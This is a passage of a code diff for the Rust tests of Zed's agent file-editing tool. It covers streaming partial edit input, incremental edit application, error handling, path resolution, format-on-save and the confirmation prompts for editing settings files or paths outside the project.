cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Edit multiple lines", + "path": "root/file.txt", + "mode": "edit" + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Edit multiple lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [{"old_text": "line 1"}] + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Edit multiple lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [ + {"old_text": "line 1", "new_text": "modified line 1"}, + {"old_text": "line 5"} + ] + })); + cx.run_until_parked(); + + // Send final complete input + sender.send_full(json!({ + "display_description": "Edit multiple lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [ + {"old_text": "line 1", "new_text": "modified line 1"}, + {"old_text": "line 5", "new_text": "modified line 5"} + ] + })); + + let result = task.await; + let EditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!( + new_text, + "modified line 1\nline 2\nline 3\nline 4\nmodified line 5\n" + ); + } + + #[gpui::test] + async fn test_streaming_create_file_with_partials(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = setup_test(cx, json!({"dir": {}})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Stream partials for create mode + sender.send_partial(json!({"display_description": "Create new file"})); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Create new file", + "path": "root/dir/new_file.txt", + "mode": "write" + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Create new file", + "path": "root/dir/new_file.txt", + "mode": "write", + "content": "Hello, " + })); + cx.run_until_parked(); + + // Final with full content + sender.send_full(json!({ + "display_description": "Create new file", + "path": "root/dir/new_file.txt", + "mode": "write", + "content": "Hello, World!" + })); + + let result = task.await; + let EditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "Hello, World!"); + } + + #[gpui::test] + async fn test_streaming_no_partials_direct_final(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Send final immediately with no partials (simulates non-streaming path) + sender.send_full(json!({ + "display_description": "Edit lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [{"old_text": "line 2", "new_text": "modified line 2"}] + })); + + let result = task.await; + let EditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "line 1\nmodified line 2\nline 3\n"); + } + + #[gpui::test] + async fn test_streaming_incremental_edit_application(cx: &mut TestAppContext) { + let (tool, project, _action_log, _fs, _thread) = setup_test( + cx, + json!({"file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n"}), + ) + .await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Stream description, path, mode + sender.send_partial(json!({"display_description": "Edit multiple lines"})); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Edit multiple lines", + "path": "root/file.txt", + "mode": "edit" + })); + cx.run_until_parked(); + + // First edit starts streaming (old_text only, still in progress) + sender.send_partial(json!({ + "display_description": "Edit multiple lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [{"old_text": "line 1"}] + })); + cx.run_until_parked(); + + // Buffer should not have changed yet — the first edit is still in progress + // (no second edit has appeared to prove the first is complete) + let buffer_text = project.update(cx, |project, cx| { + let project_path = project.find_project_path(&PathBuf::from("root/file.txt"), cx); + project_path.and_then(|pp| { + project + .get_open_buffer(&pp, cx) + .map(|buffer| buffer.read(cx).text()) + }) + }); + // Buffer is open (from streaming) but edit 1 is still in-progress + assert_eq!( + buffer_text.as_deref(), + Some("line 1\nline 2\nline 3\nline 4\nline 5\n"), + "Buffer should not be modified while first edit is still in progress" + ); + + // Second edit appears — this proves the first edit is complete, so it + // should be applied immediately during streaming + sender.send_partial(json!({ + "display_description": "Edit multiple lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [ + {"old_text": "line 1", "new_text": "MODIFIED 1"}, + {"old_text": "line 5"} + ] + })); + cx.run_until_parked(); + + // First edit should now be applied to the buffer + let buffer_text = project.update(cx, |project, cx| { + let project_path = project.find_project_path(&PathBuf::from("root/file.txt"), cx); + project_path.and_then(|pp| { + project + .get_open_buffer(&pp, cx) + .map(|buffer| buffer.read(cx).text()) + }) + }); + assert_eq!( + buffer_text.as_deref(), + Some("MODIFIED 1\nline 2\nline 3\nline 4\nline 5\n"), + "First edit should be applied during streaming when second edit appears" + ); + + // Send final complete input + sender.send_full(json!({ + "display_description": "Edit multiple lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [ + {"old_text": "line 1", "new_text": "MODIFIED 1"}, + {"old_text": "line 5", "new_text": "MODIFIED 5"} + ] + })); + + let result = task.await; + let EditFileToolOutput::Success { + new_text, old_text, .. + } = result.unwrap() + else { + panic!("expected success"); + }; + assert_eq!(new_text, "MODIFIED 1\nline 2\nline 3\nline 4\nMODIFIED 5\n"); + assert_eq!( + *old_text, "line 1\nline 2\nline 3\nline 4\nline 5\n", + "old_text should reflect the original file content before any edits" + ); + } + + #[gpui::test] + async fn test_streaming_incremental_three_edits(cx: &mut TestAppContext) { + let (tool, project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "aaa\nbbb\nccc\nddd\neee\n"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Setup: description + path + mode + sender.send_partial(json!({ + "display_description": "Edit three lines", + "path": "root/file.txt", + "mode": "edit" + })); + cx.run_until_parked(); + + // Edit 1 in progress + sender.send_partial(json!({ + "display_description": "Edit three lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [{"old_text": "aaa", "new_text": "AAA"}] + })); + cx.run_until_parked(); + + // Edit 2 appears — edit 1 is now complete and should be applied + sender.send_partial(json!({ + "display_description": "Edit three lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [ + {"old_text": "aaa", "new_text": "AAA"}, + {"old_text": "ccc", "new_text": "CCC"} + ] + })); + cx.run_until_parked(); + + // Verify edit 1 fully applied. Edit 2's new_text is being + // streamed: "CCC" is inserted but the old "ccc" isn't deleted + // yet (StreamingDiff::finish runs when edit 3 marks edit 2 done). + let buffer_text = project.update(cx, |project, cx| { + let pp = project + .find_project_path(&PathBuf::from("root/file.txt"), cx) + .unwrap(); + project.get_open_buffer(&pp, cx).map(|b| b.read(cx).text()) + }); + assert_eq!(buffer_text.as_deref(), Some("AAA\nbbb\nCCCccc\nddd\neee\n")); + + // Edit 3 appears — edit 2 is now complete and should be applied + sender.send_partial(json!({ + "display_description": "Edit three lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [ + {"old_text": "aaa", "new_text": "AAA"}, + {"old_text": "ccc", "new_text": "CCC"}, + {"old_text": "eee", "new_text": "EEE"} + ] + })); + cx.run_until_parked(); + + // Verify edits 1 and 2 fully applied. Edit 3's new_text is being + // streamed: "EEE" is inserted but old "eee" isn't deleted yet. + let buffer_text = project.update(cx, |project, cx| { + let pp = project + .find_project_path(&PathBuf::from("root/file.txt"), cx) + .unwrap(); + project.get_open_buffer(&pp, cx).map(|b| b.read(cx).text()) + }); + assert_eq!(buffer_text.as_deref(), Some("AAA\nbbb\nCCC\nddd\nEEEeee\n")); + + // Send final + sender.send_full(json!({ + "display_description": "Edit three lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [ + {"old_text": "aaa", "new_text": "AAA"}, + {"old_text": "ccc", "new_text": "CCC"}, + {"old_text": "eee", "new_text": "EEE"} + ] + })); + + let result = task.await; + let EditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "AAA\nbbb\nCCC\nddd\nEEE\n"); + } + + #[gpui::test] + async fn test_streaming_edit_failure_mid_stream(cx: &mut TestAppContext) { + let (tool, project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Setup + sender.send_partial(json!({ + "display_description": "Edit lines", + "path": "root/file.txt", + "mode": "edit" + })); + cx.run_until_parked(); + + // Edit 1 (valid) in progress — not yet complete (no second edit) + sender.send_partial(json!({ + "display_description": "Edit lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [ + {"old_text": "line 1", "new_text": "MODIFIED"} + ] + })); + cx.run_until_parked(); + + // Edit 2 appears (will fail to match) — this makes edit 1 complete. + // Edit 1 should be applied. Edit 2 is still in-progress (last edit). + sender.send_partial(json!({ + "display_description": "Edit lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [ + {"old_text": "line 1", "new_text": "MODIFIED"}, + {"old_text": "nonexistent text that does not appear anywhere in the file at all", "new_text": "whatever"} + ] + })); + cx.run_until_parked(); + + let buffer = project.update(cx, |project, cx| { + let pp = project + .find_project_path(&PathBuf::from("root/file.txt"), cx) + .unwrap(); + project.get_open_buffer(&pp, cx).unwrap() + }); + + // Verify edit 1 was applied + let buffer_text = buffer.read_with(cx, |buffer, _cx| buffer.text()); + assert_eq!( + buffer_text, "MODIFIED\nline 2\nline 3\n", + "First edit should be applied even though second edit will fail" + ); + + // Edit 3 appears — this makes edit 2 "complete", triggering its + // resolution which should fail (old_text doesn't exist in the file). + sender.send_partial(json!({ + "display_description": "Edit lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [ + {"old_text": "line 1", "new_text": "MODIFIED"}, + {"old_text": "nonexistent text that does not appear anywhere in the file at all", "new_text": "whatever"}, + {"old_text": "line 3", "new_text": "MODIFIED 3"} + ] + })); + cx.run_until_parked(); + + // The error from edit 2 should have propagated out of the partial loop. + // Drop sender to unblock recv() if the loop didn't catch it. + drop(sender); + + let result = task.await; + let EditFileToolOutput::Error { + error, + diff, + input_path, + } = result.unwrap_err() + else { + panic!("expected error"); + }; + + assert!( + error.contains("Could not find matching text for edit at index 1"), + "Expected error about edit 1 failing, got: {error}" + ); + // Ensure that first edit was applied successfully and that we saved the buffer + assert_eq!(input_path, Some(PathBuf::from("root/file.txt"))); + assert_eq!( + diff, + "@@ -1,3 +1,3 @@\n-line 1\n+MODIFIED\n line 2\n line 3\n" + ); + } + + #[gpui::test] + async fn test_streaming_single_edit_no_incremental(cx: &mut TestAppContext) { + let (tool, project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "hello world\n"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Setup + single edit that stays in-progress (no second edit to prove completion) + sender.send_partial(json!({ + "display_description": "Single edit", + "path": "root/file.txt", + "mode": "edit", + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Single edit", + "path": "root/file.txt", + "mode": "edit", + "edits": [{"old_text": "hello world", "new_text": "goodbye world"}] + })); + cx.run_until_parked(); + + // The edit's old_text and new_text both arrived in one partial, so + // the old_text is resolved and new_text is being streamed via + // StreamingDiff. The buffer reflects the in-progress diff (new text + // inserted, old text not yet fully removed until finalization). + let buffer_text = project.update(cx, |project, cx| { + let pp = project + .find_project_path(&PathBuf::from("root/file.txt"), cx) + .unwrap(); + project.get_open_buffer(&pp, cx).map(|b| b.read(cx).text()) + }); + assert_eq!( + buffer_text.as_deref(), + Some("goodbye worldhello world\n"), + "In-progress streaming diff: new text inserted, old text not yet removed" + ); + + // Send final — the edit is applied during finalization + sender.send_full(json!({ + "display_description": "Single edit", + "path": "root/file.txt", + "mode": "edit", + "edits": [{"old_text": "hello world", "new_text": "goodbye world"}] + })); + + let result = task.await; + let EditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "goodbye world\n"); + } + + #[gpui::test] + async fn test_streaming_input_partials_then_final(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; + let (mut sender, input): (ToolInputSender, ToolInput) = + ToolInput::test(); + let (event_stream, _event_rx) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Send progressively more complete partial snapshots, as the LLM would + sender.send_partial(json!({ + "display_description": "Edit lines" + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Edit lines", + "path": "root/file.txt", + "mode": "edit" + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Edit lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [{"old_text": "line 2", "new_text": "modified line 2"}] + })); + cx.run_until_parked(); + + // Send the final complete input + sender.send_full(json!({ + "display_description": "Edit lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [{"old_text": "line 2", "new_text": "modified line 2"}] + })); + + let result = task.await; + let EditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "line 1\nmodified line 2\nline 3\n"); + } + + #[gpui::test] + async fn test_streaming_input_sender_dropped_before_final(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "hello world\n"})).await; + let (mut sender, input): (ToolInputSender, ToolInput) = + ToolInput::test(); + let (event_stream, _event_rx) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Send a partial then drop the sender without sending final + sender.send_partial(json!({ + "display_description": "Edit file" + })); + cx.run_until_parked(); + + drop(sender); + + let result = task.await; + assert!( + result.is_err(), + "Tool should error when sender is dropped without sending final input" + ); + } + + #[gpui::test] + async fn test_streaming_input_recv_drains_partials(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = setup_test(cx, json!({"dir": {}})).await; + // Create a channel and send multiple partials before a final, then use + // ToolInput::resolved-style immediate delivery to confirm recv() works + // when partials are already buffered. + let (mut sender, input): (ToolInputSender, ToolInput) = + ToolInput::test(); + let (event_stream, _event_rx) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Buffer several partials before sending the final + sender.send_partial(json!({"display_description": "Create"})); + sender.send_partial(json!({"display_description": "Create", "path": "root/dir/new.txt"})); + sender.send_partial(json!({ + "display_description": "Create", + "path": "root/dir/new.txt", + "mode": "write" + })); + sender.send_full(json!({ + "display_description": "Create", + "path": "root/dir/new.txt", + "mode": "write", + "content": "streamed content" + })); + + let result = task.await; + let EditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "streamed content"); + } + + #[gpui::test] + async fn test_streaming_resolve_path_for_creating_file(cx: &mut TestAppContext) { + let mode = EditFileMode::Write; + + let result = test_resolve_path(&mode, "root/new.txt", cx); + assert_resolved_path_eq(result.await, rel_path("new.txt")); + + let result = test_resolve_path(&mode, "new.txt", cx); + assert_resolved_path_eq(result.await, rel_path("new.txt")); + + let result = test_resolve_path(&mode, "dir/new.txt", cx); + assert_resolved_path_eq(result.await, rel_path("dir/new.txt")); + + let result = test_resolve_path(&mode, "root/dir/subdir/existing.txt", cx); + assert_resolved_path_eq(result.await, rel_path("dir/subdir/existing.txt")); + + let result = test_resolve_path(&mode, "root/dir/subdir", cx); + assert_eq!( + result.await.unwrap_err(), + "Can't write to file: path is a directory" + ); + + let result = test_resolve_path(&mode, "root/dir/nonexistent_dir/new.txt", cx); + assert_eq!( + result.await.unwrap_err(), + "Can't create file: parent directory doesn't exist" + ); + } + + #[gpui::test] + async fn test_streaming_resolve_path_for_editing_file(cx: &mut TestAppContext) { + let mode = EditFileMode::Edit; + + let path_with_root = "root/dir/subdir/existing.txt"; + let path_without_root = "dir/subdir/existing.txt"; + let result = test_resolve_path(&mode, path_with_root, cx); + assert_resolved_path_eq(result.await, rel_path(path_without_root)); + + let result = test_resolve_path(&mode, path_without_root, cx); + assert_resolved_path_eq(result.await, rel_path(path_without_root)); + + let result = test_resolve_path(&mode, "root/nonexistent.txt", cx); + assert_eq!(result.await.unwrap_err(), "Can't edit file: path not found"); + + let result = test_resolve_path(&mode, "root/dir", cx); + assert_eq!( + result.await.unwrap_err(), "Can't edit file: path is a directory" ); } @@ -719,7 +2260,7 @@ mod tests { mode: &EditFileMode, path: &str, cx: &mut TestAppContext, - ) -> anyhow::Result { + ) -> Result { init_test(cx); let fs = project::FakeFs::new(cx.executor()); @@ -736,31 +2277,24 @@ mod tests { .await; let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let input = EditFileToolInput { - display_description: "Some edit".into(), - path: path.into(), - mode: mode.clone(), - }; - - cx.update(|cx| resolve_path(&input, project, cx)) + cx.update(|cx| resolve_path(*mode, &PathBuf::from(path), &project, cx)) } #[track_caller] - fn assert_resolved_path_eq(path: anyhow::Result, expected: &RelPath) { + fn assert_resolved_path_eq(path: Result, expected: &RelPath) { let actual = path.expect("Should return valid path").path; assert_eq!(actual.as_ref(), expected); } #[gpui::test] - async fn test_format_on_save(cx: &mut TestAppContext) { + async fn test_streaming_format_on_save(cx: &mut TestAppContext) { init_test(cx); let fs = project::FakeFs::new(cx.executor()); fs.insert_tree("/root", json!({"src": {}})).await; + let (tool, project, action_log, fs, thread) = + setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - - // Set up a Rust language with LSP formatting support let rust_language = Arc::new(language::Language::new( language::LanguageConfig { name: "Rust".into(), @@ -773,7 +2307,6 @@ mod tests { None, )); - // Register the language and fake LSP let language_registry = project.read_with(cx, |project, _| project.languages().clone()); language_registry.add(rust_language); @@ -788,7 +2321,6 @@ mod tests { }, ); - // Create the file fs.save( path!("/root/src/main.rs").as_ref(), &"initial content".into(), @@ -810,9 +2342,10 @@ mod tests { project.register_buffer_with_language_servers(&buffer, cx) }); - const UNFORMATTED_CONTENT: &str = "fn main() {println!(\"Hello!\");}\n"; - const FORMATTED_CONTENT: &str = - "This file was formatted by the fake formatter in the test.\n"; + const UNFORMATTED_CONTENT: &str = "fn main() {println!(\"Hello!\");}\ +"; + const FORMATTED_CONTENT: &str = "This file was formatted by the fake formatter in the test.\ +"; // Get the fake language server and set up formatting handler let fake_language_server = fake_language_servers.next().await.unwrap(); @@ -825,21 +2358,7 @@ mod tests { } }); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - - // First, test with format_on_save enabled + // Test with format_on_save enabled cx.update(|cx| { SettingsStore::update_global(cx, |store, cx| { store.update_user_settings(cx, |settings| { @@ -850,43 +2369,33 @@ mod tests { }); }); - // Have the model stream unformatted content - let edit_result = { - let edit_task = cx.update(|cx| { - let input = EditFileToolInput { - display_description: "Create main function".into(), - path: "root/src/main.rs".into(), - mode: EditFileMode::Overwrite, - }; - Arc::new(EditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry.clone(), - Templates::new(), - )) - .run( - ToolInput::resolved(input), - ToolCallEventStream::test().0, - cx, - ) - }); + // Use streaming pattern so executor can pump the LSP request/response + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); - // Stream the unformatted content - cx.executor().run_until_parked(); - model.send_last_completion_stream_text_chunk(UNFORMATTED_CONTENT.to_string()); - model.end_last_completion_stream(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - edit_task.await - }; - assert!(edit_result.is_ok()); + sender.send_partial(json!({ + "display_description": "Create main function", + "path": "root/src/main.rs", + "mode": "write" + })); + cx.run_until_parked(); + + sender.send_full(json!({ + "display_description": "Create main function", + "path": "root/src/main.rs", + "mode": "write", + "content": UNFORMATTED_CONTENT + })); + + let result = task.await; + assert!(result.is_ok()); - // Wait for any async operations (e.g. formatting) to complete cx.executor().run_until_parked(); - // Read the file to verify it was formatted automatically let new_content = fs.load(path!("/root/src/main.rs").as_ref()).await.unwrap(); assert_eq!( - // Ignore carriage returns on Windows new_content.replace("\r\n", "\n"), FORMATTED_CONTENT, "Code should be formatted when format_on_save is enabled" @@ -898,12 +2407,11 @@ mod tests { assert_eq!( stale_buffer_count, 0, - "BUG: Buffer is incorrectly marked as stale after format-on-save. Found {} stale buffers. \ - This causes the agent to think the file was modified externally when it was just formatted.", + "BUG: Buffer is incorrectly marked as stale after format-on-save. Found {} stale buffers.", stale_buffer_count ); - // Next, test with format_on_save disabled + // Test with format_on_save disabled cx.update(|cx| { SettingsStore::update_global(cx, |store, cx| { store.update_user_settings(cx, |settings| { @@ -913,43 +2421,39 @@ mod tests { }); }); - // Stream unformatted edits again - let edit_result = { - let edit_task = cx.update(|cx| { - let input = EditFileToolInput { - display_description: "Update main function".into(), - path: "root/src/main.rs".into(), - mode: EditFileMode::Overwrite, - }; - Arc::new(EditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - Templates::new(), - )) - .run( - ToolInput::resolved(input), - ToolCallEventStream::test().0, - cx, - ) - }); + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); - // Stream the unformatted content - cx.executor().run_until_parked(); - model.send_last_completion_stream_text_chunk(UNFORMATTED_CONTENT.to_string()); - model.end_last_completion_stream(); + let tool2 = Arc::new(EditFileTool::new( + project.clone(), + thread.downgrade(), + action_log.clone(), + language_registry, + )); - edit_task.await - }; - assert!(edit_result.is_ok()); + let task = cx.update(|cx| tool2.run(input, event_stream, cx)); + + sender.send_partial(json!({ + "display_description": "Update main function", + "path": "root/src/main.rs", + "mode": "write" + })); + cx.run_until_parked(); + + sender.send_full(json!({ + "display_description": "Update main function", + "path": "root/src/main.rs", + "mode": "write", + "content": UNFORMATTED_CONTENT + })); + + let result = task.await; + assert!(result.is_ok()); - // Wait for any async operations (e.g. formatting) to complete cx.executor().run_until_parked(); - // Verify the file was not formatted let new_content = fs.load(path!("/root/src/main.rs").as_ref()).await.unwrap(); assert_eq!( - // Ignore carriage returns on Windows new_content.replace("\r\n", "\n"), UNFORMATTED_CONTENT, "Code should not be formatted when format_on_save is disabled" @@ -957,13 +2461,11 @@ mod tests { } #[gpui::test] - async fn test_remove_trailing_whitespace(cx: &mut TestAppContext) { + async fn test_streaming_remove_trailing_whitespace(cx: &mut TestAppContext) { init_test(cx); let fs = project::FakeFs::new(cx.executor()); fs.insert_tree("/root", json!({"src": {}})).await; - - // Create a simple file with trailing whitespace fs.save( path!("/root/src/main.rs").as_ref(), &"initial content".into(), @@ -971,24 +2473,11 @@ mod tests { ) .await .unwrap(); + let (tool, project, action_log, fs, thread) = + setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; + let language_registry = project.read_with(cx, |p, _cx| p.languages().clone()); - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - - // First, test with remove_trailing_whitespace_on_save enabled + // Test with remove_trailing_whitespace_on_save enabled cx.update(|cx| { SettingsStore::update_global(cx, |store, cx| { store.update_user_settings(cx, |settings| { @@ -1004,44 +2493,26 @@ mod tests { const CONTENT_WITH_TRAILING_WHITESPACE: &str = "fn main() { \n println!(\"Hello!\"); \n}\n"; - // Have the model stream content that contains trailing whitespace - let edit_result = { - let edit_task = cx.update(|cx| { - let input = EditFileToolInput { - display_description: "Create main function".into(), - path: "root/src/main.rs".into(), - mode: EditFileMode::Overwrite, - }; - Arc::new(EditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry.clone(), - Templates::new(), - )) - .run( - ToolInput::resolved(input), + let result = cx + .update(|cx| { + tool.clone().run( + ToolInput::resolved(EditFileToolInput { + display_description: "Create main function".into(), + path: "root/src/main.rs".into(), + mode: EditFileMode::Write, + content: Some(CONTENT_WITH_TRAILING_WHITESPACE.into()), + edits: None, + }), ToolCallEventStream::test().0, cx, ) - }); - - // Stream the content with trailing whitespace - cx.executor().run_until_parked(); - model.send_last_completion_stream_text_chunk( - CONTENT_WITH_TRAILING_WHITESPACE.to_string(), - ); - model.end_last_completion_stream(); - - edit_task.await - }; - assert!(edit_result.is_ok()); + }) + .await; + assert!(result.is_ok()); - // Wait for any async operations (e.g. formatting) to complete cx.executor().run_until_parked(); - // Read the file to verify trailing whitespace was removed automatically assert_eq!( - // Ignore carriage returns on Windows fs.load(path!("/root/src/main.rs").as_ref()) .await .unwrap() @@ -1050,7 +2521,7 @@ mod tests { "Trailing whitespace should be removed when remove_trailing_whitespace_on_save is enabled" ); - // Next, test with remove_trailing_whitespace_on_save disabled + // Test with remove_trailing_whitespace_on_save disabled cx.update(|cx| { SettingsStore::update_global(cx, |store, cx| { store.update_user_settings(cx, |settings| { @@ -1063,46 +2534,34 @@ mod tests { }); }); - // Stream edits again with trailing whitespace - let edit_result = { - let edit_task = cx.update(|cx| { - let input = EditFileToolInput { - display_description: "Update main function".into(), - path: "root/src/main.rs".into(), - mode: EditFileMode::Overwrite, - }; - Arc::new(EditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - Templates::new(), - )) - .run( - ToolInput::resolved(input), + let tool2 = Arc::new(EditFileTool::new( + project.clone(), + thread.downgrade(), + action_log.clone(), + language_registry, + )); + + let result = cx + .update(|cx| { + tool2.run( + ToolInput::resolved(EditFileToolInput { + display_description: "Update main function".into(), + path: "root/src/main.rs".into(), + mode: EditFileMode::Write, + content: Some(CONTENT_WITH_TRAILING_WHITESPACE.into()), + edits: None, + }), ToolCallEventStream::test().0, cx, ) - }); - - // Stream the content with trailing whitespace - cx.executor().run_until_parked(); - model.send_last_completion_stream_text_chunk( - CONTENT_WITH_TRAILING_WHITESPACE.to_string(), - ); - model.end_last_completion_stream(); - - edit_task.await - }; - assert!(edit_result.is_ok()); + }) + .await; + assert!(result.is_ok()); - // Wait for any async operations (e.g. formatting) to complete cx.executor().run_until_parked(); - // Verify the file still has trailing whitespace - // Read the file again - it should still have trailing whitespace let final_content = fs.load(path!("/root/src/main.rs").as_ref()).await.unwrap(); assert_eq!( - // Ignore carriage returns on Windows final_content.replace("\r\n", "\n"), CONTENT_WITH_TRAILING_WHITESPACE, "Trailing whitespace should remain when remove_trailing_whitespace_on_save is disabled" @@ -1110,41 +2569,15 @@ mod tests { } #[gpui::test] - async fn test_authorize(cx: &mut TestAppContext) { - init_test(cx); - let fs = project::FakeFs::new(cx.executor()); - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let tool = Arc::new(EditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - Templates::new(), - )); - fs.insert_tree("/root", json!({})).await; + async fn test_streaming_authorize(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = setup_test(cx, json!({})).await; // Test 1: Path with .zed component should require confirmation let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let _auth = cx.update(|cx| { tool.authorize( - &EditFileToolInput { - display_description: "test 1".into(), - path: ".zed/settings.json".into(), - mode: EditFileMode::Edit, - }, + &PathBuf::from(".zed/settings.json"), + "test 1", &stream_tx, cx, ) @@ -1158,17 +2591,8 @@ mod tests { // Test 2: Path outside project should require confirmation let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _auth = cx.update(|cx| { - tool.authorize( - &EditFileToolInput { - display_description: "test 2".into(), - path: "/etc/hosts".into(), - mode: EditFileMode::Edit, - }, - &stream_tx, - cx, - ) - }); + let _auth = + cx.update(|cx| tool.authorize(&PathBuf::from("/etc/hosts"), "test 2", &stream_tx, cx)); let event = stream_rx.expect_authorization().await; assert_eq!(event.tool_call.fields.title, Some("test 2".into())); @@ -1176,15 +2600,7 @@ mod tests { // Test 3: Relative path without .zed should not require confirmation let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); cx.update(|cx| { - tool.authorize( - &EditFileToolInput { - display_description: "test 3".into(), - path: "root/src/main.rs".into(), - mode: EditFileMode::Edit, - }, - &stream_tx, - cx, - ) + tool.authorize(&PathBuf::from("root/src/main.rs"), "test 3", &stream_tx, cx) }) .await .unwrap(); @@ -1194,11 +2610,8 @@ mod tests { let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let _auth = cx.update(|cx| { tool.authorize( - &EditFileToolInput { - display_description: "test 4".into(), - path: "root/.zed/tasks.json".into(), - mode: EditFileMode::Edit, - }, + &PathBuf::from("root/.zed/tasks.json"), + "test 4", &stream_tx, cx, ) @@ -1221,11 +2634,8 @@ mod tests { let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); 